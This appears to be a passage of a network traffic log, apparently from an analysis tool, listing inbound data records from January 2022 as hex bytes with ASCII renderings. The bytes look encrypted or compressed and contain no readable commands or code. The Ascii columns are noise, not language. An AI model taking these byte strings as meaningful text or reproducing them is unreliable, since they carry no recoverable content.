2022-01-14 12:49:38 UTC	479	IN	Data Raw: 38 92 9b f8 56 e5 d7 79 ad 60 b4 83 1d 99 6c 5c 73 80 e4 ec dc 1b 10 fe 46 66 6e 33 bd 1e f7 a1 3c 4a 1b 3d b9 d8 e3 02 b2 b7 9b 5e 02 44 d2 87 42 87 71 17 ac 19 7c 39 d2 21 3d 35 e1 5e 6a 76 71 53 2b bb 71 93 c6 0b 72 9d 3f c2 df b1 b5 b1 82 7a 37 8e ac 96 e2 6a 7b 3e 8c c6 dc 76 29 ca 77 fb 2d 7b d6 b4 0b 1d 57 54 70 7e 1a e8 03 fc 77 79 e7 3c d3 98 be de b6 99 83 a7 25 fa f4 61 6a 0a 7e 77 c9 44 97 5f 02 4d 8e 10 0c ea 29 a7 71 4d e4 2d 3b 65 9c be b6 63 c1 e3 f1 f0 4b e8 6c a0 b8 76 b8 eb 52 13 f5 63 e9 7a 21 2a 02 1f e8 05 8a 08 40 e5 70 5f 62 64 66 d4 c2 0c 86 09 9f 52 eb 72 98 16 dd 04 61 9e 92 df 7e 77 21 2f 89 12 57 e1 20 ac 67 cb e1 0f 82 41 29 d0 c4 cc 4e 44 2a 78 e2 09 aa 92 05 74 96 41 07 3b 39 61 2b 48 c5 9b 59 09 da ef f2 a9 42 1f 28 f3 b5 Data Ascii: 8Vy`l\sFfn3<J=^DBq\|9!=5^jvqS+qr?z7j{>v)w-{WTp~wy<%aj~wD_M)qM-;ecKlvRcz!@p_bdfRra~w!/W gA)NDxtA;9a+HYB(
2022-01-14 12:49:38 UTC	480	IN	Data Raw: 54 e1 4a ee 93 07 d2 85 bd 94 eb ec 39 56 79 f6 c7 13 e0 ef 3c 44 66 93 e4 44 92 65 12 e9 33 58 f0 f8 f6 af 24 96 bd 71 ed 92 38 b2 c3 88 e5 53 8a e7 1c 55 c8 7e c1 97 82 6a 32 9c bf d1 53 29 44 33 4e 4b 5c 67 95 92 27 74 14 15 50 98 c0 3d 74 1a 74 8f ba e0 87 2d 1c 50 7e 98 a2 33 a8 b7 f5 72 c3 c7 3c 7f c1 5a 5f d7 dc 11 86 30 49 bf 3b 7e 63 81 e6 f6 6a 2f 2f 0a fc ba b5 39 b0 ec 36 e0 ae 72 e8 1e 16 e0 34 0d e8 59 9a bf b8 1b 1d 37 c6 f8 6b 6e 07 63 f6 86 5d 83 bf 8b f2 c4 9f fa 6a 08 bc 56 15 7c 54 de fd c4 2a 48 9a e6 1c f8 71 97 04 5e 5e 1f c8 39 1e b8 29 48 46 2e f9 cd 59 71 e7 ae 87 11 fa 5f 79 1f c1 47 af 5d e5 03 bb 0c 3f 22 cd e4 d6 e6 38 33 2a 7b b0 1c 32 dc 25 62 5a 8f 43 87 91 6f b4 2b 23 15 30 e1 b0 aa 61 98 e0 b0 f3 eb de bb 75 d9 cc 92 37 Data Ascii: TJ9Vy<DfDe3X$q8SU~j2S)D3NK\g'tP=tt-P~3r<Z_0I;~cj//96r4Y7knc]jV\|THq^^9)HF.Yq_yG]?"83{2%bZCo+#0au7
2022-01-14 12:49:38 UTC	482	IN	Data Raw: 4c ec 18 d3 d3 05 8d 8e 84 03 af 59 b7 bc b3 b3 31 fa 1a d4 7e ae f8 18 7a 9f d0 64 0a f7 44 ed dd 66 24 5b a5 de 5c 7e 2f c2 88 69 63 db 06 74 ca b5 94 a0 b6 d7 60 19 02 3b db e2 9a 5b 40 b1 71 e5 48 56 92 c2 22 91 79 c3 8e ac ff cc e2 7b 53 5d fa 8d 6e a0 f2 a0 19 39 d1 46 b9 56 82 b9 d5 ed ee 99 92 a4 38 55 1c b2 c0 10 6c 6b f6 49 59 6c ec 8f 99 7b 27 89 d0 89 03 a3 7c 68 fb 85 34 13 df 38 65 21 69 43 c7 ab ad 07 97 e0 b4 cb cf ab 9d d1 e9 d7 f2 48 bf 8d 97 22 c6 5c ca 2e e9 0e 2c 19 30 4a 65 73 e8 3a 85 08 4d e7 aa aa d0 3a 75 0f 99 7e 94 8e 7e 55 d2 33 c7 61 68 ce 11 cf eb 55 c2 23 93 f0 29 56 29 17 65 d8 aa 9f 4b 9a 0a 3c 7d 81 61 7d d3 bb 52 b1 fb 11 76 80 8f 13 cf ce 9d 7b 3c fd 7c 48 bc 6e 02 fd 51 0a 68 0f 96 dc 8d 10 cb 1c b7 a9 d2 f9 80 b7 da Data Ascii: LY1~zdDf$[\~/ict`;[@qHV"y{S]n9FV8UlkIYl{'\|h48e!iCH"\.,0Jes:M:u~~U3ahU#)V)eK<}a}Rv{<\|HnQh
2022-01-14 12:49:38 UTC	483	IN	Data Raw: ad 04 f3 2e 9e cb e5 72 6d fa 33 f8 0d 68 98 ca 33 38 87 d4 a8 2e ae d0 68 00 3e ea e2 43 55 c5 97 ef 61 d6 85 14 07 47 d5 42 52 a3 40 9d e8 eb ea c6 a9 76 25 9c 28 37 72 31 e5 73 ed e4 7b db 42 a9 a9 48 94 9f ac 73 99 c7 62 55 75 4d 33 ed f9 d7 be 96 c6 93 c2 50 c0 06 d1 49 44 62 30 4d 71 69 a5 46 1d 86 b1 59 d6 02 62 e7 57 6d d7 1f 78 4f f6 df 1f d1 15 85 0b de 3d d8 9e 19 8a b8 ae 03 04 da 3c 35 3b 13 ff 3e 7f a6 66 9f 1a 4b 57 57 55 ed ca a0 f5 6e 59 e8 23 23 e0 74 4c 6a 92 28 ed b1 5a 07 5d c9 99 f9 24 36 5e 43 d7 bb a2 41 65 93 cc 22 56 20 e5 25 72 0a 78 ba 3a 9d eb c7 52 5c cb 03 e7 94 5f 9e bd 2f 6c 5c 88 71 46 bb 3a 68 0f a7 2e a8 64 9e d9 6c 48 46 2a 80 71 2d 81 3a 3e e1 90 bb c1 a2 0b d3 95 c0 63 1a b9 c9 da 57 dd dc 33 6f 52 f3 41 a5 5c 2c 22 Data Ascii: .rm3h38.h>CUaGBR@v%(7r1s{BHsbUuM3PIDb0MqiFYbWmxO=<5;>fKWWUnY##tLj(Z]$6^CAe"V %rx:R\_/l\qF:h.dlHF*q-:>cW3oRA\,"
2022-01-14 12:49:38 UTC	484	IN	Data Raw: 9e cd ef 71 c5 93 db 8d 46 07 0c ac f4 01 e6 5c 93 de ce 5c 04 fd 80 97 4a 67 27 cd 75 2b f9 b3 93 96 25 7f 55 58 85 73 38 a7 e9 a0 d3 b8 4f 44 51 c7 6c b7 a0 94 7e 1c c1 7f 6e c6 57 91 0e 36 07 3a 4c d4 a4 06 fb 50 ae 1b 09 d8 c7 62 4b 2b a0 77 8a 82 ac 7a 24 8e 09 e9 93 cc 1e db ad 11 53 17 b7 2e c8 aa 19 d8 51 7c d7 b6 2a 8c 4f 3e 70 26 14 96 7f b0 e1 8e f3 7b 7e 09 21 de 2b ad 5d 17 61 8e 3d ee ca 4c e0 5a 9a a8 83 0a e7 dd fa 2d c4 10 59 58 ed e2 14 3e 59 95 d0 c7 78 cb 62 73 d4 fc 50 53 bf 16 4c 98 7a 70 c4 7e 23 6e 6f 5d c9 57 06 fe 53 ea ba 17 d5 c2 4a 26 15 89 2e ca 07 13 51 8d dc 03 0e d9 f5 15 b3 65 76 4b b7 d2 c9 d8 84 8a 8c 10 7f d6 f7 7b e3 ec 8e 42 72 bf e8 c3 cb 1b ba b2 3c 9f f8 25 f8 15 ed 2f cf 4e 94 79 74 3d c9 f7 94 d8 09 58 11 f7 81 Data Ascii: qF\\Jg'u+%UXs8ODQl~nW6:LPbK+wz$S.Q\|*O>p&{~!+]a=LZ-YX>YxbsPSLzp~#no]WSJ&.QevK{Br<%/Nyt=X
2022-01-14 12:49:38 UTC	486	IN	Data Raw: 7a 86 21 50 61 45 91 04 46 51 b5 77 ec 6d 21 0f cd b9 8f 6f 51 7d e7 2c a9 a0 17 6e e9 a5 11 11 99 b1 83 e8 4f 74 15 b9 35 54 3e f1 7c bd f1 bc cb 46 fa a2 72 df 44 3e f4 d7 4e f8 ab fb b1 e6 cd 3c f2 72 cb 1d b7 c0 6b ab 0c b0 38 de fd 1f e1 ed 9a 6d e1 05 b4 93 c2 84 60 15 6c d0 12 a7 ab 38 1b ba b7 3a 79 f8 6d 0c 3b 45 c2 0a f8 0b e8 a5 cf c0 63 a4 ac 49 48 06 77 81 b6 22 2c 03 3f a2 41 cb 53 eb bd 54 b9 1f 39 de 83 3d a5 23 33 4c ac 93 3d 2c ed c0 1f 0e b3 92 6d 09 f3 94 40 d4 86 d6 a1 cb be 29 7f e0 19 c5 94 35 56 a9 a7 d7 9b d0 ea 9a f1 a1 a0 2d 54 56 bf a5 43 02 5b 56 80 68 8f ec 76 47 27 cb 22 ff b2 d4 c6 77 9b 71 11 7b ef e2 42 5e 9e 44 fb a2 ca e1 f4 8f 34 05 04 d3 c9 57 2b 76 10 23 77 9c 19 13 58 05 d3 5e 84 8a e0 1e 62 67 9e 19 6d f1 a5 05 26 Data Ascii: z!PaEFQwm!oQ},nOt5T>\|FrD>N<rk8m`l8:ym;EcIHw",?AST9=#3L=,m@)5V-TVC[VhvG'"wq{B^D4W+v#wX^bgm&
2022-01-14 12:49:38 UTC	487	IN	Data Raw: 29 6a 84 f8 23 c0 11 1f 54 c0 91 97 a8 5a 9a f9 08 4a b9 46 3c 95 e9 8e ae 52 c1 86 6b d3 1c a3 3b 35 75 e1 9d c4 42 a5 cd 83 b0 4a db 01 88 23 0e e0 60 78 f9 db 9c c9 20 8b 57 5a 89 a4 d1 e4 e5 aa 3a b5 1c ed 79 70 4d 9a d3 9c fd 7e 55 04 da a6 6d c1 ad 8e e2 75 65 9e af b2 e2 bf ff de 10 a1 96 46 7a 28 4c 00 53 92 04 35 07 72 2a 29 72 c0 4d b2 88 f8 6c 59 5b c0 b2 37 22 fd 2d 78 92 fa 79 d7 e8 a6 22 d0 b6 0a 7c 69 82 fa 32 bf 84 c1 ad 31 5c 5b 9e c5 67 cd 8b 81 7d 30 c5 c7 48 c6 76 3d d2 e3 c6 dc ee b7 c1 50 19 a0 b5 df 9c 6b 69 02 3b 14 a6 91 41 98 08 be 74 c8 54 75 45 eb 6e 4b e5 d6 cd d1 c2 99 8b 3f cf b0 bb c9 55 36 f1 c7 52 29 68 e6 da 3c 28 77 7c 1b 8b 2c 79 36 95 b8 bb d4 14 fa 3a 43 d1 31 34 6a d4 07 f6 86 b5 54 f9 a1 3f 69 4a 59 fc 4a fa 01 81 Data Ascii: )j#TZJF<Rk;5uBJ#`x WZ:ypM~UmueFz(LS5r*)rMlY[7"-xy"\|i21\[g}0Hv=Pki;AtTuEnK?U6R)h<(w\|,y6:C14jT?iJYJ
2022-01-14 12:49:38 UTC	488	IN	Data Raw: dd 00 0e b9 2f ef c6 69 99 f8 50 99 73 87 0d 72 bd f4 a1 ae 5b 11 d8 fa 85 71 ac b5 ec 0a 6d ae 20 8f d7 67 70 67 6f 4c 1d e0 d4 1e e3 a7 7d 6c 78 27 a2 cb 7e 3d 14 a2 1a b8 f4 a6 34 23 dc f8 1a 3d 10 58 36 fc 1d 2e 61 e0 aa cd 72 da 85 46 34 a0 03 22 83 13 f6 1e 30 5f cb 09 12 58 8c 74 13 c2 e3 a4 60 66 41 7c a6 25 cd 60 4f 5b 8f c0 a6 d0 66 71 fa a8 46 fb 66 81 c7 6f cd 61 51 98 57 f8 a8 f0 6e a7 72 8f 75 3e ef 4f 47 3e f4 7d 32 8c ab 78 39 82 65 be 72 2f c6 4e 01 55 4c 59 0c 6f 55 9c 4a 23 6e 1b 70 d4 56 fd 20 83 ee e9 ab 7f cd b3 a6 ec e9 ab b9 48 63 6d 81 27 a3 d0 b8 e4 5f c9 b5 ac c3 64 3e dd 2f 24 86 90 df bf ad 25 42 89 ed e1 6d 31 08 e6 ce c9 9c bd 80 d5 ce 39 25 e6 35 0f aa f4 82 8c c9 10 0c 8b 49 b9 94 c1 58 f2 1e e4 23 4a 65 89 88 71 3a 98 3e Data Ascii: /iPsr[qm gpgoL}lx'~=4#=X6.arF4"0_Xt`fA\|%`O[fqFfoaQWnru>OG>}2x9er/NULYoUJ#npV Hcm'_d>/$%Bm19%5IX#Jeq:>
2022-01-14 12:49:38 UTC	490	IN	Data Raw: 6c 04 21 11 fd c4 1e f8 dc e8 cb 0e 5c 29 da 7e a2 90 3c 10 2e d9 64 ec 6f 36 39 61 9e 75 5d e4 be 6f 74 d5 44 8a cb d8 3c 3d 60 6f fa b7 62 0b c6 cb cc ca 97 c7 4a b9 46 70 47 91 bc 97 dc 94 cb b8 d8 f7 0c 96 2b 73 04 6c 32 d9 c0 d1 9b 5d 56 e4 b5 67 b5 c8 f8 5e 75 f5 35 f6 e8 11 aa 27 a7 8f 4d 2f 37 e6 7f 32 b9 1c 22 b3 46 e8 80 0c 35 82 8b 55 69 d5 63 89 d6 26 84 2d 04 6b ee 70 b0 5e 0d ed b2 1c a1 be 79 b9 97 8c dd 90 fd 11 7b d1 43 55 d8 96 26 29 68 f6 9c 45 00 20 5b 39 fd 9b 34 1e 1a f6 18 eb 01 aa 9f 0f 51 29 68 cf 78 b6 39 4a 39 93 e1 6b ce b3 e2 06 d6 fb 9d 30 c5 73 2a d6 cb fa d0 d1 25 b7 12 84 ef 52 c6 9c 1e 0a fb bb 7a ff f6 58 9d 36 3c ae 99 36 cb c3 9a 1b e5 38 e7 b2 10 db bf 32 33 a4 02 7f 49 cb 28 c7 e8 7d 48 e4 54 98 4c 00 27 4d 1d 7e d4 Data Ascii: l!\)~<.do69au]otD<=`obJFpG+sl2]Vg^u5'M/72"F5Uic&-kp^y{CU&)hE [94Q)hx9J9k0s*%RzX6<6823I(}HTL'M~
2022-01-14 12:49:38 UTC	491	IN	Data Raw: c2 5c 46 45 d7 e9 ad 83 28 1a 93 d0 03 b6 25 fd b8 5e 8b 15 0d a4 8a a0 17 81 fd e0 c7 a6 11 19 78 f6 99 c8 63 16 e7 e8 e5 4f 8e bd 7b 76 98 7e ef 84 80 a3 bc b4 e7 bf 38 b3 73 4a a5 87 39 6d 70 cd da e5 71 c1 56 b4 51 be 8f 8d 9e c3 dc b0 9a ce 7a 4d b5 b1 13 96 5c d6 29 b8 7b 8a ec 2a 09 d6 c5 24 8b fd 8c fa fb f4 6e 7d af a9 95 dc 89 87 09 25 86 49 8b 89 bb 9e 8f 2c 0b c9 f0 de e8 6e f9 aa 99 53 0e 96 c4 de a6 43 56 c8 87 35 6b 20 67 48 b1 ea b7 d0 30 39 af 14 f9 83 d0 e1 15 9c e1 c6 dd 9a 11 27 4c 11 10 17 ec e7 40 16 4e a8 ec dd 47 10 54 59 36 6c ff d1 ae 00 e6 cc 85 b2 ef fb 25 16 ca 02 7d f3 04 79 19 60 7c 93 ad 2b 79 1b 7d 3b 57 6b 23 f8 4d 43 a2 56 0a 31 60 01 2a 47 cb fa d2 e0 91 7f 4f 24 7f df ea bb 99 f5 4e 12 87 73 a9 87 74 8e 92 29 67 79 e6 Data Ascii: \FE(%^xcO{v~8sJ9mpqVQzM\){$n}%I,nSCV5k gH09'L@NGTY6l%}y`\|+y};Wk#MCV1`GO$Nst)gy
2022-01-14 12:49:38 UTC	493	IN	Data Raw: e4 94 8d c0 f4 05 47 0c a4 02 a0 73 24 a0 e6 dc c2 ee 94 84 7a 66 0d 66 d3 3b c7 0a 3e 7d 6b c4 b6 de 8a 11 d1 47 33 8d 5b 5a 7e c9 f8 fe 75 86 e4 a6 6c e4 57 ab c2 0d e9 bb 27 ae 36 77 c8 8c 9b b9 99 e7 a2 dc 83 34 70 72 1b 34 95 e9 17 a4 d6 50 4a 34 1a db fc f3 67 79 fd 9b dd a0 9a bd a2 88 d8 08 bb 8d 1f 77 13 68 d4 11 38 c1 05 87 d4 a5 00 f0 2e 15 be a1 10 94 13 64 cd 61 3e 87 2e b6 72 78 3d ff 73 14 b8 6c e0 dd 65 9d 60 c1 4c 51 89 64 ca 79 e6 1a 2e 0d 23 b6 6c d8 de 24 2d cb 2f 45 11 bf 25 d1 2b 0a ba 12 4b b3 fc 4d c5 1d 7a 09 73 a0 b8 89 35 14 8f 6f fc 49 ce 28 e0 42 1d a7 e3 2f f3 56 fb 4d 01 e0 88 70 f7 a3 a8 a6 b0 c7 41 ba 65 34 44 1c df e3 8b ab 7a 64 78 88 a1 c3 1d 73 1e 06 fb cf 89 e1 8d fe e8 4b d1 65 8f 93 fe 70 38 f6 8e ef fb de 6d 31 b2 Data Ascii: Gs$zff;>}kG3[Z~ulW'6w4pr4PJ4gywh8.da>.rx=sle`LQdy.#l$-/E%+KMzs5oI(B/VMpAe4DzdxsKep8m1
2022-01-14 12:49:38 UTC	494	IN	Data Raw: 34 2a 31 98 e2 b1 d0 18 29 fe b5 bd 61 5b 7c 43 aa 2a 9d 02 22 c7 b7 52 70 b1 d7 b8 2c 1e 63 4f ca e8 69 eb e6 f8 3c d2 3f e1 e5 30 a7 cb cc c1 f3 fc ca dd 8b e9 b3 d8 bd 95 7b 85 77 79 46 dc e8 da 5e 15 22 4e 80 6f 39 89 e2 70 01 d3 a3 65 56 cc 8b 5e 80 02 4c 2f 0a 6b 83 47 15 c4 e7 18 05 a3 43 86 9a 42 ee 73 80 10 7b 09 76 a2 e1 49 36 da 5b 57 e9 90 63 2f 5d 6b b5 38 f7 ac dd a6 d7 ad e3 f4 16 b4 15 61 59 ee 7b ec a4 b3 d2 4b cf 55 e5 b9 ac 1d 22 89 5b a4 bc af 16 95 7b b0 9d aa 32 1a 17 2c 6b 22 1c 85 87 06 8f a5 c7 16 52 6b 51 cc c1 9e 97 c0 5a 83 5a 95 33 10 40 25 77 f2 33 d0 6c 54 58 bc 51 f4 d7 49 79 56 21 37 0e f4 48 a6 b8 be 07 e8 c3 95 b3 c5 35 45 7e 0c 34 af f2 7f 03 ed 76 97 e0 fb e4 25 d4 5e c5 8d 00 c2 e2 42 e4 2b bc 5b 9b c3 08 11 08 58 9c Data Ascii: 41)a[\|C"Rp,cOi<?0{wyF^"No9peV^L/kGCBs{vI6[Wc/]k8aY{KU"[{2,k"RkQZZ3@%w3lTXQIyV!7H5E~4v%^B+[X
2022-01-14 12:49:38 UTC	495	IN	Data Raw: 29 11 28 69 2a cf 0e a5 45 28 30 18 3e 34 2d 99 35 82 95 51 a5 9a 53 ae a1 bd 3e f8 f3 5b 40 c4 28 ae f9 9d 93 e4 3f 7d a5 ac cc ce da cb cb 48 f5 76 43 40 65 32 d2 24 3d 43 ee 4a 2a 77 95 c7 36 82 ab 94 7a e3 bf ef 71 3c 5f 9b 33 36 48 eb 1c cc 12 09 10 28 57 38 39 4c 4c d2 36 45 5f d5 59 10 02 ab a0 07 6e 23 67 23 b9 fb f6 46 c9 64 8a c8 88 4a 12 44 c9 75 10 81 fc 86 ee f9 d8 22 e9 ce 32 34 92 f4 89 2c 4f 01 b2 cf 6b 80 e8 1f 11 10 ef 14 01 48 70 cb c9 c4 4e ab e6 67 2a c7 2f 0c 5f ef bb d9 52 42 9c 6d 93 21 27 a6 2e c1 22 10 96 63 d2 ee 0a 04 87 60 79 0e d7 d2 c7 a9 e3 e9 c0 6d bb 74 08 a2 ec d3 67 1a 60 0b fb 56 88 e1 4e 44 4e 7d e3 8a 2e cd 16 d8 fc 51 73 9c 96 ea 87 86 09 89 52 d9 ab 65 3d b2 9b 26 b1 50 dc 56 04 13 de ca 45 86 69 eb c1 7e a3 2f 35 Data Ascii: )(iE(0>4-5QS>[@(?}HvC@e2$=CJw6zq<_36H(W89LL6E_Yn#g#FdJDu"24,OkHpNg*/_RBm!'."c`ymtg`VNDN}.QsRe=&PVEi~/5
2022-01-14 12:49:38 UTC	497	IN	Data Raw: 17 bf a9 06 2e e1 7d ea 22 85 5e 47 f2 27 dc 09 8c 08 e3 f9 d6 95 6a 61 70 67 a0 76 6e ea f4 71 07 8a eb 20 c7 b4 d8 80 17 95 20 48 9d d4 e0 0a 58 d1 3f 47 44 65 2c 9e 65 9a 84 e7 46 06 98 02 de fe 5f 29 01 5a 5f 7b 44 09 2b f7 35 0d 34 17 03 17 e3 60 c0 98 8b ba 4d 10 72 62 0d 92 3a 18 34 fa 15 f2 c3 e6 f4 57 2c 69 65 47 30 6d 7b ac 21 03 64 9d 16 4c ab d4 4e 76 a2 5d ad ab 44 6c 5b 91 5f 51 5d 27 f1 e0 e2 41 e0 e6 c9 84 1d 7e 0b 8d 7e f2 35 2d db f5 7c 67 25 f9 46 25 ac da 09 09 c1 d9 9c c6 70 ca cc 98 dd aa 1b 5b ad 19 3f c4 b8 42 98 89 a8 5e 84 92 d0 dd 75 d7 d2 d8 e8 e9 9d 93 de d5 4e 1a c2 d0 16 f5 09 bf a4 1b 27 6d a1 f2 40 d4 34 89 3a e4 fe 6e f2 f8 c6 77 c7 34 e9 94 83 02 81 7b 35 78 95 56 ce 7f 44 58 cc 4f 6b 44 9a b6 c9 3c 59 7e b3 bd 50 5a 09 Data Ascii: .}"^G'japgvnq HX?GDe,eF_)Z_{D+54`Mrb:4W,ieG0m{!dLNv]Dl[_Q]'A~~5-\|g%F%p[?B^uN'm@4:nw4{5xVDXOkD<Y~PZ
2022-01-14 12:49:38 UTC	498	IN	Data Raw: 18 63 bc e2 40 47 74 ff 70 d6 5a b1 ca bd 60 53 10 1f 89 e1 df 38 c5 43 c7 bc 8f 73 08 fb 41 6c 2c 49 d1 be 41 0d 69 f7 69 7e ab a1 14 c4 4e 69 b7 2f a1 ed 6b 31 c8 15 df 71 05 a0 0c ff 6f 02 8b 43 fa 18 90 9e ff 4c 34 dc 4a 87 6b a6 bc c6 62 9d 80 ff 9a 64 c8 4f f5 e1 1b 4a d3 c2 15 20 c6 e9 47 1f bc e9 68 eb de c5 7d 06 6f 97 21 cf 27 29 3b 03 16 4e 03 e9 36 69 6c d7 04 cb 6b 28 67 fd 47 75 64 a8 28 7e 19 de 82 ab f1 5d 36 8e e0 ae d8 23 88 fe 8d d1 a8 76 6d 1e 90 d3 94 8b 06 15 e7 b7 dd 0b d0 e4 dc 5b b8 b7 17 0c 57 c4 8e 67 73 4e 5a ea 55 45 e4 bb 10 3a cf 6f 5e 05 fe ca 23 b9 c6 d0 9b 89 a6 92 74 62 a9 c7 c2 2d a5 80 a8 88 1e 89 70 8c ab 99 f6 ea 38 05 69 50 f4 13 6f a0 41 78 0b 3e 8c 01 e4 27 cc b5 74 98 98 25 55 b4 85 4d a4 c0 64 da 12 d6 20 2e bf Data Ascii: c@GtpZ`S8CsAl,IAii~Ni/k1qoCL4JkbdOJ Gh}o!');N6ilk(gGud(~]6#vm[WgsNZUE:o^#tb-p8iPoAx>'t%UMd .
2022-01-14 12:49:38 UTC	499	IN	Data Raw: 64 34 ab 01 b6 e7 d1 2f 22 59 a9 ee f8 74 57 8b 43 9d c1 e3 5e 66 49 88 01 d5 a6 f9 1c c9 a8 03 88 0f 50 29 ff 20 cf d1 f9 e3 fb 7e 10 8b 6f e1 fc 39 41 76 77 64 40 86 3c 7e 6d 6f 14 cd 68 77 19 20 e2 d1 16 74 c2 5e c7 3a 79 df a4 32 10 ee dc 2d 0c 90 10 e8 c1 97 5f 9e d5 76 7c 61 cb 9f e3 b4 cc ee d2 5a 71 14 4b a0 c1 e6 0e 08 39 d9 de 4a 59 77 4a c1 17 bd 06 9d 6d d6 cc 30 e6 2f 75 f6 f2 a9 13 8c 2f d8 c1 ae 23 27 27 ef f5 29 15 dd 97 8a cc d9 9f 34 57 7f f4 52 87 6c 1e 03 a9 86 d5 c8 17 3f e3 53 e9 9b cc ad ab 01 57 06 4b a8 98 dd 28 ac a7 46 36 62 9e 4e fc cd 1f 17 e6 dc aa 07 f4 bd f8 41 32 79 be 6c 8e ac ec fd cd e6 04 52 92 b3 23 34 46 09 b5 5d 55 9d fc 0a 6d 62 cf 8e 54 12 93 37 d4 49 1c 01 81 79 2b 04 d7 28 21 23 cc 52 28 e1 f3 b0 b7 aa 7a 86 27 Data Ascii: d4/"YtWC^fIP) ~o9Avwd@<~mohw t^:y2-_v\|aZqK9JYwJm0/u/#'')4WRl?SWK(F6bNA2ylR#4F]UmbT7Iy+(!#R(z'
2022-01-14 12:49:38 UTC	501	IN	Data Raw: d4 6e b7 8e 4a b3 f3 fb f1 fd 79 31 40 9a a7 a8 2a 20 99 f9 9e 64 50 9f c3 c0 d2 23 d3 74 78 92 04 c6 e8 5a c3 f5 d5 31 ac 08 92 db b7 c4 3b 20 df d9 e6 ad b7 4f de 50 84 99 dc 87 59 d9 14 3a 9b 91 79 ee b4 70 0c 75 df 42 1d 91 cf 90 29 49 57 ea 38 4d 15 28 80 56 58 35 b6 f8 a1 f2 45 a8 6f 40 e2 80 c4 99 42 54 27 88 42 ac c7 9e 50 e8 2a 73 a4 12 ec 8b 14 63 0d 66 62 8b 34 76 a7 92 33 98 75 3b 6d fc ae ed 4a 5a 4b 8a 62 3e 14 b7 00 b5 21 0f 23 9f f7 0c 99 ae 27 b8 0c d0 3a 26 e3 1d f7 12 34 dc 7f 48 d3 e4 a2 22 a1 2b 96 48 51 44 59 91 1d 3f 91 1d 7c 32 81 1b 49 14 ea f7 71 5a 22 06 3b 4a b0 46 d6 d6 b4 83 9a bb 98 f6 a6 fd 65 96 f2 9f e5 9e ff eb c0 81 00 a4 b7 5a a7 eb a9 7e 83 72 54 2d c2 dd 9b d9 cc 3d c3 2a 97 81 fe 7b f0 2d c9 18 b2 62 d3 cb 05 d7 4d Data Ascii: nJy1@* dP#txZ1; OPY:ypuB)IW8M(VX5Eo@BT'BPscfb4v3u;mJZKb>!#':&4H"+HQDY?\|2IqZ";JFeZ~rT-={-bM
2022-01-14 12:49:38 UTC	502	IN	Data Raw: 83 91 4a 72 1e 69 57 04 1c b3 1a 50 af a3 6a a8 f3 9b dd 53 a2 02 a1 8b f8 27 82 7d ea e3 f6 68 a2 ec 0b 9f 52 70 c0 08 12 e0 cc cc 98 cc c9 c2 7a 90 27 2e 3f 6c 33 b7 87 5d 97 64 14 96 30 e3 6d 82 61 1d b4 cf 47 f1 f5 e2 39 d2 10 db 5a 26 ad 34 26 bb 13 b1 27 3f 47 b3 06 58 d5 4e a5 a6 38 14 cd e4 70 a6 f5 1f 42 e2 d9 97 f1 8f 3b e1 e3 75 3c 20 d9 5d 75 3d cb f0 e7 41 98 17 e6 df b2 17 e4 f7 0f c2 ea b5 88 34 34 3a 7e 44 17 56 08 c1 59 dc 5f a7 7d f3 d1 7c ed f9 62 bb 05 dc 25 64 d2 1b fd 69 bc 40 38 f1 7f 4b 20 d1 87 1e ff 2b 0c e3 71 38 f3 2c dc 89 3b d1 fb cd 9a ad d1 75 f4 37 41 b4 9e 1d 75 74 77 79 76 57 db 40 11 1b 5a 16 ac d5 b2 86 ed 01 79 36 3d 18 85 a4 23 d6 44 d0 53 6d 7e 2d 37 3f 7a 33 da 6b b0 2a b2 07 3e dc 28 89 9a cf 85 96 ca 86 02 4b 10 Data Ascii: JriWPjS'}hRpz'.?l3]d0maG9Z&4&'?GXN8pB;u< ]u=A44:~DVY_}\|b%di@8K +q8,;u7AutwyvW@Zy6=#DSm~-7?z3k*>(K
2022-01-14 12:49:38 UTC	503	IN	Data Raw: 8c 12 b2 8d 4a 30 82 4b 46 9f 76 d4 97 88 8a 5b 30 97 77 b3 15 1d cd fa c9 ec 22 a9 88 33 a1 ed c0 36 5f 40 7b a1 fc 23 c2 e1 48 86 96 7b 6e 9c c9 fb f3 f8 36 73 e3 96 18 09 18 02 9c 33 76 39 cd 46 49 0b bc 01 e0 fd 4c 81 ac 61 d9 09 0f da 85 d7 60 ec 07 dc 9a 1b 5a 56 9d 8e 60 ce 81 3e 9a b4 9f 2c 02 d2 06 f2 4e cf 53 24 3e 9a 7b 0b 4d f0 26 8d c1 6d 3c 7b 8d f4 9e 4d 60 af 07 38 44 8e 2b a8 c5 14 24 4d 1c 74 0d c7 66 15 eb d6 83 a5 cf d1 1b c7 87 d7 a5 43 4e 08 06 e6 46 9a 28 e2 78 f3 5b c2 49 ed e8 79 f5 91 98 6d 57 df 7e 76 24 1d 19 84 7f 26 e4 b8 3d 7a b0 07 dd de 09 72 9c ab 11 0b ce 4b c9 b9 52 5a c9 ca 1c 8b 48 37 eb 91 fc 2e 16 c0 2e 78 d5 a3 18 bf 45 7d 85 cd 27 a3 e5 d2 88 23 49 85 3e b7 4d 79 dd 05 42 8a 72 8c 77 d6 96 34 74 63 89 92 83 30 6e Data Ascii: J0KFv[0w"36_@{#H{n6s3v9FILa`ZV`>,NS$>{M&m<{M`8D+$MtfCNF(x[IymW~v$&=zrKRZH7..xE}'#I>MyBrw4tc0n
2022-01-14 12:49:38 UTC	505	IN	Data Raw: 53 4b 02 b6 c9 3b 3f 8a 78 37 eb f4 c6 7a d5 db 21 94 46 b1 2d 27 eb 9a 14 0c dc 65 e5 c5 fd 26 9e 4c 91 16 0b 8d 98 5c 19 88 37 28 26 9a 4d a3 5b 04 e1 5b 50 49 e8 4a 3a a9 e3 82 b5 7f 00 d9 c1 97 dd d2 b4 a5 b8 4b 5c 7e fc 59 40 b3 30 a3 93 2f 96 20 90 99 fa f4 4f 45 17 a2 f9 ed 62 5c f1 50 a5 19 85 ef b4 4e 79 90 77 27 e9 d8 0b 8f 59 d3 5f 1d b3 9b 1c 77 c0 dd 26 07 f3 e3 64 ae db 22 c7 81 67 ad 97 43 9a 0a 9c 46 62 17 e9 56 af df b1 83 49 70 67 b2 02 81 da 8d e3 74 2c fe 34 15 99 6c d4 da c5 b9 b4 15 45 b9 b3 c2 0c 4f bc 4b 7f 51 d5 45 a0 94 6f 1c 77 c2 a9 ca 85 92 30 59 70 cf 7f d6 1f 53 e2 17 80 cc 13 5c c8 d6 2b cc 2d 98 0e a9 df 11 12 31 d9 bf 75 4d 72 6d ba 3c 15 9b d8 af ba f4 5d f5 9b 43 fd 15 a2 3f 46 0e 60 6e 17 a8 1c fe 38 dc 26 f4 f0 12 ce Data Ascii: 